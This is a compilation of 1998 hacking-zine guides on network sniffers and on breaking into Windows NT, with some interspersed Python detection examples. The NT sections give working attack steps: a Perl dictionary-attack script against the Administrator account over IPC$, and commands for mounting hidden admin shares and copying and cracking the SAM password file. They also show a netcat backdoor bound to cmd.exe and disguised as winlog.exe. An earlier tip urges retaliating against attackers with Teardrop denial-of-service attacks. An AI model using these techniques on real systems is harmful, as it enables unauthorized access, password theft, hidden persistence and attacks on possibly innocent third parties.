Let’s begin with EtherPeek. Besides the Mac version, there is a version that runs on Windows NT, and even Windows 95/98. However, I recommend the Mac version because not many hackers know how to compromise, disable or crash Macs. Windows, by contrast, is vulnerable to the many denial of service attacks that kode kiddies think are 31337 (elite).
While you can protect your Windows boxes from attacks from the Internet with a well-configured router and firewall, what if the intruder is inside your LAN?

**********************************************
Wizard tip: If you have a cable modem, try EtherPeek on it. You will probably discover your cable modem is a node on an Ethernet -- and you can see what everyone else on your cable system is doing! That means, of course, that the other guys can see you. Even without EtherPeek, it could be a great playground to test your ability to figure out the details of all the hardware on your cable modem network.
**********************************************

**********************************************
You can get punched in the nose warning: It probably won’t be a good idea to exploit what EtherPeek tells you to tease your next door neighbor about his visit last night to bianca’s Smut Shack.
**********************************************

EtherPeek is good for evaluating your security setup. For example, EtherPeek can be used to check the way people login to computers on your network to find out whether these boxes are correctly configured to only send encrypted passwords over your Ethernet. This is necessary because, amazingly enough, many network file servers, mail systems, and databases automatically install in such a way that they send clear text passwords over the network. Once an attacker breaks into one box on a network like that, he or she can install a program such as Sniffit and soon capture every password.

Here’s an important note. If your network uses Microsoft Point-to-Point Tunneling Protocol (PPTP) to encrypt passwords, and if you have a Solaris box on your LAN, you are nevertheless heading for trouble. There is a free sniffer at http://www.l0pht.com/l0phtcrack which runs on Solaris and captures encrypted PPTP passwords. Another free program at this site cracks them.
By the time you read this, there may be versions of this sniffer that run on other operating systems, too. For a cryptographic analysis of why it is easy to crack PPTP, see http://www.counterpane.com/pptp.html.

However, back to EtherPeek. It has a “Tools” menu that allows you to test firewalls and routers. For example, you can check to make sure the firewall is blocking the computers on your LAN from replying with valuable information to a port scan from someone on the outside.

The creator of EtherPeek and president of AG Group, Mahboud Zabetian, also explains that his software can collect “messages looking for passwords.” In his words, the “File Transfer Protocol (ftp) application in the TCP/IP suite has a PASSWORD embedded command in the command stream channel that is ideal for filter writing. By setting up EtherPeek with a filter for PASSWORD commands embedded in FTP, the security person can quickly examine why systems are failing password connections or where high connection count password attempts are coming from when trying to find the source of random login hacking.”

OK, I agree with you, the kind of cracker who repeatedly attempts to get into an ftp server by guessing at passwords is seriously lame. However, even lame hackers sometimes get lucky. You would be surprised at how many users choose a password that is the same as their user name, or even choose to have no password at all (just hit “enter”). The best way to deal with this problem is to run a program that forces users to choose secure passwords. Alec Muffet’s cracklib will do this. It’s available for free at http://www.nmrc.org/files/sunix/index.html.

Zabetian also has advice for how to spot the sophisticated break-in artist at work. “By looking for what ‘does not belong’ on the network connections as well as what does...” one may spot “potential security issues before they become problems.
For instance, if there are a lot of connection attempts from a specific address external to the authorized group, it’s time to pay a visit to the offender and find out what’s going on before it gets serious.” Yes, that’s right, a hacker really can get punched in the nose, er, paid a “visit,” if he or she does too much port scanning and poking around someone’s network.

For best results, EtherPeek (or any good computer crime fighting software) should be set up on one computer outside the firewall (you do have a firewall, right?) and another inside to deal with the intruders who manage to get inside anyhow. Besides, almost half of all computer crime is committed by people who are already users on the local area networks they attack.

EtherPeek is shipped with a companion program, AGNetTools, which can port scan your network while EtherPeek records its results. As mentioned above, one of the warning signs that you have an unexpected visitor is unauthorized ports showing up. Also, sometimes someone gets careless and accidentally opens a Web or ftp port that has little or no security -- and opens the door to invaders.

EtherPeek is a great hacker research tool, too. It can detect the corrupted packets of exploits such as Land and Teardrop that disable vulnerable computers. It can save these packets for you to resend against a test computer so you can learn how they do their dirty work. Besides, sometimes there is a hardware glitch that accidentally manufactures destructively corrupt packets. One time when Rt66 Internet was suffering from corrupt packets, EtherPeek helped a sysadmin find the offending hardware within minutes.

Occasionally you may be attacked by a truly sophisticated opponent. For example, one trick is to run a denial of service attack such as syn flood in which each packet has a different origination IP address. This will trick many router and firewall defenses into not realizing they are under an attack which will soon shut them down.
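Two detection claims in this chapter are worth seeing in code: that the sender of a “stealth” bare-FIN scan can be picked out from the wire (the EtherPeek result reported earlier), and that a syn flood with a different origination address on every packet can still be recognized if you count per target instead of per source. Here is an added Python example, not code from the Guide nor from EtherPeek, that runs both checks over constructed packet records of the kind a sniffer logs (time, source, destination, port, TCP flags). The addresses (the Guide’s foobarred 198.987.999 network plus made-up 10.x.y.z sources) and the thresholds are invented for the demo.

```python
"""Spot two attack patterns in packet records that per-source rules miss.

Added example, not code from the Guide nor from EtherPeek. It works over
constructed records (time_s, src, dst, dport, tcp_flags) such as a sniffer
would log, and answers two questions raised in this chapter: who sent a
"stealth" bare-FIN scan, and is a syn flood under way even though every
packet claims a different origination address. Addresses (the Guide's
foobarred 198.987.999 network plus made-up 10.x.y.z sources) and thresholds
are invented for the demo.
"""
from collections import Counter, defaultdict

TARGET = "198.987.999.33"
PACKETS = []

# 1) One host probes twelve ports with bare FIN packets: the Nmap "stealth" pattern.
for i, port in enumerate((21, 22, 23, 25, 53, 79, 80, 110, 111, 113, 139, 143)):
    PACKETS.append((10.0 + i * 0.01, "198.987.999.51", TARGET, port, {"FIN"}))

# 2) 200 bare SYNs to port 80 in one second, each with a different (spoofed) source.
for i in range(200):
    PACKETS.append((20.0 + i * 0.005, f"10.{i // 100}.{i % 100}.{i % 7 + 1}", TARGET, 80, {"SYN"}))

# 3) Ordinary traffic: one complete handshake and an orderly close.
PACKETS += [
    (30.0, "198.987.999.66", TARGET, 80, {"SYN"}),
    (30.1, TARGET, "198.987.999.66", 1030, {"SYN", "ACK"}),
    (30.2, "198.987.999.66", TARGET, 80, {"ACK"}),
    (31.0, "198.987.999.66", TARGET, 80, {"FIN", "ACK"}),
]


def fin_scan_sources(packets, min_ports=8):
    """Sources that sent bare-FIN packets (FIN without ACK) to many distinct ports of one host.

    A legitimate close carries FIN together with ACK, so bare FINs to ports that
    never had a connection are the scanner's signature, and the source address
    on them is real because the scanner needs the RST replies to come back.
    """
    probed = defaultdict(set)
    for _, src, dst, dport, flags in packets:
        if flags == {"FIN"}:
            probed[(src, dst)].add(dport)
    return sorted((src, dst, len(ports)) for (src, dst), ports in probed.items()
                  if len(ports) >= min_ports)


def syn_flood_targets(packets, window=1.0, min_syns=100):
    """Targets that received >= min_syns bare SYNs within any `window` seconds.

    Counting per destination is what survives address spoofing: every fake
    source sends a single SYN, far below any per-source limit, but the target's
    half-open queue fills up just the same. Each alert reports (dst, dport,
    SYNs in window, distinct sources, SYNs from the busiest single source).
    """
    syns = defaultdict(list)  # (dst, dport) -> [(time, src)]
    for t, src, dst, dport, flags in packets:
        if flags == {"SYN"}:
            syns[(dst, dport)].append((t, src))
    alerts = []
    for (dst, dport), events in syns.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= min_syns:
                per_source = Counter(src for _, src in events[start:end + 1])
                alerts.append((dst, dport, end - start + 1, len(per_source), max(per_source.values())))
                break
    return alerts


if __name__ == "__main__":
    for src, dst, n in fin_scan_sources(PACKETS):
        print(f"FIN scan: {src} probed {n} ports on {dst}")
    for dst, dport, n, sources, busiest in syn_flood_targets(PACKETS):
        print(f"SYN flood on {dst}:{dport}: {n} SYNs in a second from {sources} sources "
              f"(busiest source sent {busiest}, so a per-source rule sees nothing)")
```

On the sample the scan is attributed to 198.987.999.51 (twelve ports, bare FIN), and the flood on port 80 is reported with 100 distinct sources and a busiest-source count of 1, which is exactly why a router rule that limits SYNs per source address never fires. The normal handshake in the third group triggers neither check.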
EtherPeek, however, can analyze (but not deflect) this attack. As mentioned above, EtherPeek easily identifies the sender of so-called stealth port scans. It also detects the true IP address of someone setting up a spoofed IP connection. The attacker is sitting there sending messages to the victim computer thinking that the identity of his computer is hidden. Yet on the other end a sysadmin is looking on the screen of his Mac G3 at the IP address, laughing as he unleashes a Teardrop attack to crash the attacker’s computer. Sorry, EtherPeek doesn’t strike back. You have to go to a site such as http://www.rootshell.com to get denial of service software such as Teardrop to strike back at the bad guys.

*******************************
You can go to jail warning: What if the attacker is on a hacked account of an innocent victim? You might get into trouble if you retaliate with a denial of service attack.
*******************************

*******************************
Wizard tip: If you can determine that your attacker is on a dynamically assigned IP address, you might be able to fight back with impunity. A good way to see whether an IP address is dynamically assigned is the command “nslookup hostname” where you substitute the attacking IP address for “hostname”. If you get back an answer “Non-existent host/domain,” it may be time to fight back! However, if this gets you in trouble anyhow -- remember I warned you.
*******************************

So what do you do when the bad guys attack? EtherPeek can set off a pager when it detects suspicious activity. When the day comes that you are under serious attack, you need to be physically at the network, even if it means being rousted out of bed. Sometimes the only thing you can do to halt your attacker is to physically disconnect your network from the Internet. If you have modem access to your network, you also have to make certain you know where all the modems are, and disable dial-ins.
(Use a wardialer to check for secret modem connections to your LAN.) EtherPeek is also useful for logging the evidence you need to put your attackers behind bars.

IP-Watcher, written by Mike Neuman, president of En Garde Systems (http://www.engarde.com) is in some ways an even more powerful tool for putting computer criminals behind bars. Neuman has worked closely with several customers to get arrests and convictions of these destructive intruders. This gives him the real-world experience needed to design a tool that will gather evidence that will stand up in court.

While gathering evidence, IP-Watcher has the power to protect your network by letting you hijack the attacker’s IP session. You can secretly divert the attacker into a “jail” computer where he or she will think they are still at the IP address of the computer they originally broke into. If it turns out this is a malicious intruder, you can record his or her activities in order to prove criminal intent, while not risking anything outside the jail computer.

This software was written, according to Neuman, with “our philosophy of manual intrusion detection ... based on the fact that an intruder must establish connections with other computers to accomplish his or her goal. These connections are an intruder's footprints, and the best way to catch the intruder is to have an advanced visualization of those footprints.”

The Windows version of IP-Watcher, T-sight, is, according to Neuman, even more advanced than IP-Watcher. Like EtherPeek, Neuman’s products have an option to page you when they detect that someone has broken in.

IP-Watcher would be a deadly tool in the hands of criminals. In order to prevent its abuse, En Garde Systems will only sell your copy of the software pre-compiled for your particular network on which you plan to run it, and enabled to only sniff and control IP sessions on your LAN.
Neuman points out a number of ways IP-Watcher can be abused:

· IP-Watcher can create network traffic with spoofed source and destination addresses. This makes it possible to kill any user’s connection. While this is essential for stopping attackers, it also could be used to deny access to a legitimate user.
· When IP-Watcher terminates a user’s connection while trying to log in, it looks to the user like the network merely had a fault. Normally the user will try to log in again, at which point IP-Watcher can divert his connection so that it steals the user’s password.
· If a sysadmin uses the “su” command to enter a root account, IP-Watcher will sniff the cleartext password through its ability to log keystrokes.
· This software also can be set to log what it sniffs in many small files. This is useful because it makes it hard for an intruder to edit log files. However, if IP-Watcher is in the hands of an attacker, this feature prevents the sysadmin from discovering a hidden sniffer by the technique of looking for unexplained large files.
· Even one-time password systems are vulnerable to IP-Watcher. It can be used to hijack a connection by a trusted user. While the user is going about his or her business, the intruder can be secretly using the same connection to install back doors.

**********************************
You can go to jail warning: Computer criminals may be tempted to attempt to break into the En Garde Systems’ LAN in hopes of stealing the source code for T-sight and IP-Watcher. This is probably the best place to go if one sincerely wants to get convicted of a computer crime.
**********************************

Conclusion

Self defense against computer criminals is a topic that has long been neglected. This is because you have to think like an attacker and be intimately familiar with his or her tools and tactics. However, many systems administrators rely solely on commercial computer security products to keep the bad guys out.
The problem is: no firewall is perfect! By contrast, if you use some of the software and techniques of this chapter to watch for and battle intruders, you have a fighting chance even if your firewall fails to stop the bad guys. Also, it can be fun to detect and fight your attackers. Be sure to save those TTY-Watcher logs so you can play back your latest hacker battle at parties!

_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! And don’t expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed.

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 Carolyn Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________

__________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 10 Part 1
How to Break into Windows NT
____________________________________________________________
by keydet89@yahoo.com

"Improving the security of your site by breaking into it, the NT version"

The purpose of this article is to illustrate to NT users (and sysadmins) how to test and verify the security of their own system or site by breaking into it, using the techniques that an attacker would use.
Further, this guide assumes that you are using NT to test an NT system...the Win95 versions of the commands used in this guide aren't as powerful as the NT versions.

***********************************************************
YOU COULD GO TO JAIL WARNING: Gaining unauthorized access to computers is against the law...read the GTMHH files on computer crime and the law. If you want to try out some or all of the techniques presented here, make sure that you get permission.
***********************************************************

In 1993, Dan Farmer and Wietse Venema wrote a paper called "Improving the security of your site by breaking into it." This paper took the view of "what better way to test your computer and network security of your site than by breaking into it." This is a good view to take...try using "hacker" techniques to break into your site to see how vulnerable you are. The paper in question can be found at: http://www.trouble.org/security.

A good place to start for reference is a previous GTMHH entitled "NT Security - Locking down the system". This guide discusses some of the steps that need to be taken to secure an NT workstation or standalone server. The guide also contains links to files that contain more in-depth information and explanations, as well as information particular to sysadmins.

In review of the previous guide, some "light" reading:

Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt
Vacuum's NT Exploits document at http://207.89.195.250/texts/
NeonSurge's documents at http://207.89.195.250/texts/
Santeria Systems' "Hardening NT" document at http://pw2.netcom.com/~honeyluv/index.html

Most of the techniques outlined in this guide are meant to be run against the local system, by using the IP address assigned by your ISP. However, it's more fun to get with your friends, and connect your systems to the Internet. Then meet at one location, and try these techniques against your own systems.
The methods described in this guide are intended to be exercises for the reader.

[The Remote Attack]

In order to protect your system from outside attack, you need to think like an attacker. What does an attacker want with your system? Access...it's all about access. Regardless of the motives or ultimate goals, an attacker wants access. Preferably, root/admin access...the attacker wants to gain administrator access to your system, or "own" your system. So to ensure that your system is secure, you need to "attack" it the way the attacker would.

To begin with, you need to see what the attacker sees. In order to find potentially vulnerable NT (or 95) systems, all you need to do is scan a range of IP addresses to see if port 139 is open. Port 139 is the "NetBIOS session" port, that is used in file and print sharing...which is potentially the most dangerous aspect of NT! To locate systems with port 139 active, get a port scanner like Sam Spade (http://www.blighty.com). Sam Spade lets you scan a range of IP addresses for a single port. Try running whichever port scanner you use against your own system.

********************************************************************
NEWBIE NOTE: Finding a system with port 139 open does not automatically mean that the target system is 95 or NT. Un*x and Linux systems run SAMBA, which allows them to share files "the Microsoft way". However, the focus of this guide is NT, so we'll leave SAMBA for another day.
********************************************************************

Okay, so you've run a port scanner against your own system and found port 139 open. The next step is to run the "nbtstat" command against your own system:

c:\>nbtstat -A [ipaddr]

NOTE: Make sure you use the capital "A", and the IP address assigned by your ISP when you dial in. To see the IP address that you were assigned, type "ipconfig /all" at the command prompt.

This will return the NetBIOS Name Table of your system.
The files mentioned above from the Rhino9 site (http://207.89.195.250/texts/) go into more detail regarding what everything in the table refers to, but what we (and the attacker) are interested in are the hex codes in the center column of the table. If you see a code '<20>', this means that your system is advertising that it has shares available. The scary thing is that these shares are potentially available via the Internet!! I say "potentially" because we haven't checked yet.

Okay, if you haven't seen the '<20>' code, then you can be relatively sure that you are safe, to some degree. Just remember, as long as a computer is turned on, and especially when it's connected to the Internet, there is no such thing as 100% security.

If you do see the '<20>' code, then the next step is to gather a little information about our system. To do that, we need to go to: http://www.ntsecurity.com/ and get a copy of the RedButton program. RedButton is a nifty little proof-of-concept program to show that it is possible to log onto an NT system without presenting a username or password. The NTSecurity.com site (http://www.ntsecurity.com/RedButton/default.htm) describes the RedButton program. Run the program against your own system, and see what type of information is available. You will see any available shares, to include any hidden admin shares (ie, shares that end in "$". By default, there are several of these shares available...C$, WINNT$, IPC$, etc).

The next step is to attempt to log into your system by using the "net" command. To do this, you need to attempt to connect to the "IPC$" share, which is one of the default, hidden shares that is part of the NT installation. Attempting to make this connection is best done from a remote machine, preferably a friend's NT system.
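Reading the name table by eye works for one machine; for a self-audit of several it helps to have the interpretation written down. The following is an added example, not from the guide or from any of the tools it mentions: a parser for the table that "nbtstat -A" prints, fed here with a constructed table (the host, workgroup and user names are invented, and the column layout is an approximation of the NT 4 output). Besides the '<20>' code the text focuses on (the File Server Service, i.e. shares advertised), it pulls out the other thing this table gives away to anyone who can reach port 139: a '<03>' UNIQUE entry that is not also the computer name is the name of the user currently logged on, which is a handy head start for the password guessing described further on.

```python
"""Parse and interpret the NetBIOS name table that "nbtstat -A" prints.
Added example; the sample table below is constructed, not a real capture."""
import re
from typing import Dict, List, NamedTuple

SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
NTBOX          <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
NTBOX          <20>  UNIQUE      Registered
NTBOX          <03>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered
KEYDET         <03>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00
"""

# Well-known NetBIOS name suffixes and what registering them means.
SUFFIX = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "domain / workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user name)",
    ("20", "UNIQUE"): "File Server Service (shares are being advertised)",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
}


class Entry(NamedTuple):
    name: str
    suffix: str   # two hex digits, upper case
    kind: str     # UNIQUE or GROUP
    status: str


# One table row: name, <hex suffix>, UNIQUE|GROUP, status word.
ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


def parse_name_table(text: str) -> List[Entry]:
    return [Entry(n, s.upper(), k, st) for n, s, k, st in ROW.findall(text)]


def audit_name_table(text: str) -> Dict[str, object]:
    """Summarise what the table discloses: the computer name, whether shares
    are advertised (<20>), which user names are logged on, and the roles the
    host has registered."""
    entries = parse_name_table(text)
    computer = {e.name for e in entries if e.suffix == "00" and e.kind == "UNIQUE"}
    users = sorted(e.name for e in entries
                   if e.suffix == "03" and e.kind == "UNIQUE" and e.name not in computer)
    roles = sorted({SUFFIX[(e.suffix, e.kind)] for e in entries if (e.suffix, e.kind) in SUFFIX})
    return {
        "computer": sorted(computer),
        "advertises_shares": any(e.suffix == "20" for e in entries),
        "logged_on_users": users,
        "roles": roles,
    }


if __name__ == "__main__":
    for k, v in audit_name_table(SAMPLE_NBTSTAT).items():
        print(f"{k}: {v}")
```

If the audit reports "advertises_shares" for a machine that is dialled into the Internet, the fix the earlier "Locking down the system" guide covers is to unbind file and print sharing from the dial-up adapter; the name table is also the quickest way to confirm afterwards that the '<20>' registration is gone.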
Attempt the connection by typing:

c:\>net use \\[ipaddr]\ipc$

********************************************************************
NEWBIE NOTE: The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that...if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in...it's recorded as a failed login attempt. The concept of the IPC$ share is covered in greater detail in Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT Exploits document at http://207.89.195.250/texts/.
********************************************************************

When this connection is attempted, the currently logged on username and password from the local system are sent for authentication. If you are logged on as "Administrator", this may not be a problem, and only password guesses will be required. If you (rather foolishly) use a "null" password (ie, don't use a password at all), then logging in is a trivial matter. You may laugh, but you would be surprised at the number of NT systems that don't have a password for the Administrator account.

The 'net' command can also be run using username and password guesses:

c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:

This command will either fail, or be completed successfully...the command will not pause waiting for further input, such as a password. That makes this syntax very easy to add to scripts and batch files. NAT (a program available from http://www.secnet.com) will automate these attempts, based on user-configurable files.
NAT can be used in conjunction with dictionary files and wordlists to attack specific user accounts, such as Administrator. If you have changed the name of the Administrator account, as suggested by Microsoft and various professional security consulting firms, you can still use RedButton to determine what that new name is and attack it. Download a copy of NAT (you can get versions of NAT for 95/NT or Linux) and try running it against either your system or your buddy's system. The downside of NAT is that when given two files, it tries the first username and all of the passwords in the password list, before moving on to the second username.

NAT can be configured to some degree but you can also use tools such as Perl to configure this "dictionary attack" to your own tastes. You can create a Perl script that includes the following command (note the doubled backslashes and the escaped "$", which Perl needs inside a double-quoted string):

open(IPC, "net use \\\\xxx.xxx.xxx.xxx\\ipc\$ /user: | ");

********************************************************************
NEWBIE NOTE: Perl is a great programming language to learn on your way to other languages, such as C or Java. It's an interpreted language, like Java, but much faster than Java. Also, just about every Un*x sysadmin knows how to program in Perl. Fortunately, there is a version of Perl available for 95 and NT at http://www.activestate.com . There is also a wealth of reference material and examples of Perl scripts available from http://www.perl.com.
********************************************************************

The following Perl script can be used to conduct a dictionary attack against your own system or a friend's system (with his permission, of course):

----- begin script -----
# ipcchk.plx by Keydet89
# script to take names from a text file, and attempt to
# complete the IPC$ connection using the name as both the
# username and password
# successful connections are logged to the log file
# no checking of arguments is provided, user must enter a
# valid IP address for the target server
#
# usage: c:\>perl ipcchk.plx [ipaddr]

open(TEST, "names.txt") || die "Could not open file.";
open(LOG, ">>ipc.log") || die "Could not open log.";

if (length($ARGV[0]) == 0) {
    print "Usage: perl ipcchk.plx [ipaddr]";
    exit(0);
}

$server = $ARGV[0];

# one candidate per line of names.txt
while (<TEST>) {
    $name = $_;
    chop($name);
    # print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n";
    open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | ");
    while (<IPC>) {
        if (grep(/successfully/, $_)) {
            print LOG "$server accepts connections for password $name\n";
            # delete a successful connection to avoid multiple connections to
            # the same machine
            open(DEL, "net use \\\\$server\\ipc\$ /d | ");
            close(DEL);
        }
    }
    close(IPC);
}

close(LOG);
close(TEST);
----- end script -----

This script is easily configurable, and can be run on a system with Perl for Win32 installed. For information on installing Perl for Win32 on your 95 or NT system, see: http://reference.perl.com/query.cgi?windows

Minor modifications to this script will allow you to conduct a similar attack against other accounts on your system.

The IPC$ share is the key to compromising an NT server. It is only following a successful connection that the real work toward exploiting this vulnerability can be done. This is especially true if you've gained access via the Administrator account, or an account in the Administrator group.
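The newbie note above makes the defender's point: with auditing of logon and logoff turned on, every one of those "net use" attempts, successful or not, lands in the Security log, so a dictionary run like the script's is visible as a burst of failures from one workstation against one account, sometimes followed by a success. The following is an added example, not code from the guide: detection logic run over a constructed export of such events (the comma-separated export format is an assumption; the event numbers are the NT 4 Security log's 528 for a successful logon and 529 for a bad user name or password, and logon type 3 is a network logon, which is what an IPC$ connection produces).

```python
"""Spot password guessing in NT logon audit events. Added example; the
export format is assumed and the sample lines are constructed."""
from collections import defaultdict, deque
from typing import List, NamedTuple


class LogonEvent(NamedTuple):
    ts: int          # seconds since an arbitrary epoch (constructed)
    event_id: int    # NT 4 Security log: 528 = successful logon, 529 = unknown user name or bad password
    user: str
    workstation: str
    logon_type: int  # 3 = network logon (an IPC$ connection), 2 = interactive


# Constructed sample (not a real export). Assumed export format:
# ts,event_id,user,workstation,logon_type
SAMPLE_LOG = """\
100,529,Administrator,REMOTE1,3
101,529,Administrator,REMOTE1,3
102,529,Administrator,REMOTE1,3
103,529,Administrator,REMOTE1,3
104,529,Administrator,REMOTE1,3
105,529,Administrator,REMOTE1,3
106,528,Administrator,REMOTE1,3
200,529,keydet,WORKSTN7,2
900,528,keydet,WORKSTN7,2
"""


def parse_log(text: str) -> List[LogonEvent]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, ws, lt = line.split(",")
        events.append(LogonEvent(int(ts), int(eid), user, ws, int(lt)))
    return events


def detect_guessing(events: List[LogonEvent], window: int = 300, threshold: int = 5):
    """A 'burst' is >= threshold failures (529) from one workstation against
    one account within `window` seconds. A 'success_after_burst' is a 528
    for the same pair while the burst is still inside the window: the
    signature of a dictionary attack that found the password."""
    recent = defaultdict(deque)   # (workstation, user) -> timestamps of recent failures
    reported = set()
    findings = []
    for e in sorted(events, key=lambda ev: ev.ts):
        key = (e.workstation, e.user)
        q = recent[key]
        while q and e.ts - q[0] > window:     # drop failures that have aged out
            q.popleft()
        if e.event_id == 529:
            q.append(e.ts)
            if len(q) >= threshold and key not in reported:
                reported.add(key)
                findings.append(("burst", e.workstation, e.user, len(q)))
        elif e.event_id == 528 and len(q) >= threshold:
            findings.append(("success_after_burst", e.workstation, e.user, e.logon_type))
    return findings


if __name__ == "__main__":
    for f in detect_guessing(parse_log(SAMPLE_LOG)):
        print(f)
```

The single failure by "keydet" followed by a successful interactive logon fifteen minutes later is an ordinary mistyped password and produces nothing; six network failures in seven seconds against Administrator, then a success, is what the script above looks like from the other side. None of this is recorded unless Audit Policy in User Manager has Logon and Logoff checked for both Success and Failure, which is the setting the newbie note is alluding to.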
Once you have successfully completed an IPC$ connection to your buddy's machine, you can then try to see if he has any shares available using the 'net' command:

c:\>net view \\[ipaddr]

Depending upon how your friend set up his machine, there may or may not be shares available. If shares are available, you can attempt to connect to them using the 'net' command:

c:\>net use x: \\[ipaddr]\[share]

If this command doesn't work the first time, don't worry. You can follow the same steps as above to attempt a dictionary attack. You shouldn't need to, however...if you gained access to your friend's machine via the Administrator account.

But you're not safe just because you haven't specifically made shares available yourself. Even if the C:\ drive itself isn't specifically shared on the server, you still have access to it as the C$ share if the IPC$ connection leads to Administrator access. Once the connection to the IPC$ share is successfully completed, the next command to attempt is:

c:\>net use g: \\xxx.xxx.xxx.xxx\c$

*******************************************************************
NEWBIE NOTE: Notice this command is a little different from the earlier version of the "net use" command. In this case, the "c$" share is a physical disk on the target server, so you need to assign it a device name on your local machine. To see the syntax for this command, enter "net use /?" at the command prompt.
*******************************************************************

Once you've gained access to the C$ share, type:

c:\>dir g: /p

to view the contents of your friend's C:\ drive.

If you have successfully completed the IPC$ connection, you can do other things besides access 'hidden' (as in 'not anymore!!') shares. Once your friend creates an account for you and places it in the Administrator group, log in via the IPC$ connection. Then click Start -> Run, and type 'regedit'.
Choose Registry -> Connect Network Registry..., and type the IP address of your friend's machine into the dialogue box. Wait a minute, and you will be able to view parts of his Registry.

[Password Cracking]

If you gain access to the system (I should say 'your' system), then there are several things you can do. Let's say you've gone after /etc/passwd files on Un*x systems...how would you do this on an NT system?

NT keeps user passwords in the SAM (Security Accounts Manager) file. When a system is turned on, you generally can't access this file, especially if you are a regular user (ie, not Administrator). However, in the c:\winnt\repair directory, you will see a file called "SAM._". This is the compressed version of the SAM database that is created when the system is installed, and updated whenever the rdisk utility is run. Users have the ability to read (and copy) this file.

Note: The next exercise is intended to be run on your own machine. However, once you have access to a friend's computer and connected to the C$ share (shown above), you can get a copy of the SAM._ file from his machine by typing:

c:\>copy g:\winnt\repair\sam._

So let's have a little fun. First, create several user accounts in User Manager, using blank or easily guessable passwords...words from the dictionary, etc. You can use these accounts to either try breaking into your system, or provide valid accounts to your friends so that only they can log in. After you've created the accounts, have a couple of blank, formatted diskettes available, and type:

c:\>rdisk /s

Follow the instructions that appear in the windows. When you're done, go to the c:\winnt\repair directory, and copy the "SAM._" file to another directory (for the purposes of this exercise, c:\temp).
Now type:

c:\temp>expand SAM._ sam

Now pass the file through SAMDump (you can find SAMDump at http://www.nmrc.org/files/snt/index.html) in order to put the file in a format that is usable by a password cracker:

c:\temp>samdump sam > samfile

You now have a usable "samfile". Now you just need to run a password cracker, such as l0phtcrack (from either http://www.l0pht.com or http://www.nmrc.org/files/snt/index.html) or NTCrack (from either http://www.secnet.com or http://www.nmrc.org/files/snt/index.html)

Once you gain access to your friend's computer, you can leave little backdoors and practical jokes...if your friend has a sense of humor.

Coming next GTMHH: WinNT Back Doors and Practical Jokes!

_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed!

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________

__________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 10 Part 2
How to Break into Windows NT: Backdoors and Practical Jokes
____________________________________________________________
by keydet89@yahoo.com

[Backdoors and Practical Jokes]

Creating backdoors is how you can ensure your ability to return to the system at will.
This is almost a black art when dealing with Un*x systems, and it can also be done on NT.

netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure its operation. This makes netcat, combined with a properly configured command-line launched from a batch file, an excellent choice for a backdoor. (get netcat for NT from http://www.l0pht.com/weld)

The batch file needs to contain:

nc -L -d -p [port] -t -e cmd.exe

   -L   tells netcat to keep listening after the current session terminates
   -d   detach - don't open a DOS window when running (IMPORTANT)
   -p   which port to bind to
   -t   enable telnet negotiations
   -e   command to execute upon connection

Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them. Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)...

Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode:

c:\>nc -v [ipaddress of target] [port]

So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date.
